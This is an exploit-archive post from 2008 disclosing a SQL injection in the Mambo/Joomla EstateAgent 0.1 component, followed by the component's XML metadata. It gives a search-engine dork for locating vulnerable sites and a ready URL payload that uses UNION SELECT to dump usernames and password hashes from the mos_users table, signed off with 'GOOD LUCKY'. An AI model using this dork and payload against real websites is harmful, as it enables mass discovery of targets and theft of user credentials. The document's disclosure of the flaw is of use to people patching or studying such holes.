Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability
# Published : 2008-01-30
# Author : S@BUN
# Previous Title : Mambo Component jokes 1.0 (cat) SQL Injection Vulnerability
# Next Title : Wordpress Plugin WassUp 1.4.3 (spy.php to_date) SQL Injection Exploit

#########################################################################
#
# joomla SQL Injection(com_estateagent)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorK 1 : allinurl: allinurl: "com_estateagent"
#
########################################################################
EXPLOIT :

index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN

#########################################################################
# S@BUN                      www.hackturkiye.com                   S@BUN
#########################################################################
# S@BUN                         GOOD LUCKY                          S@BUN
######################################################################### 

<name>EstateAgent</name>
<creationDate>17.08.2004</creationDate>
<author>Darko Selesi</author>
	<copyright>
This component is released under the GNU/GPL License
</copyright>
<authorEmail>e.agent@frame-works.de</authorEmail>
<authorUrl>mambo.frame-works.de</authorUrl>
<version>0.1</version>
<description>EstateAgent component for Mambo 4.5.x</description>

# www.Syue.com [2008-01-30]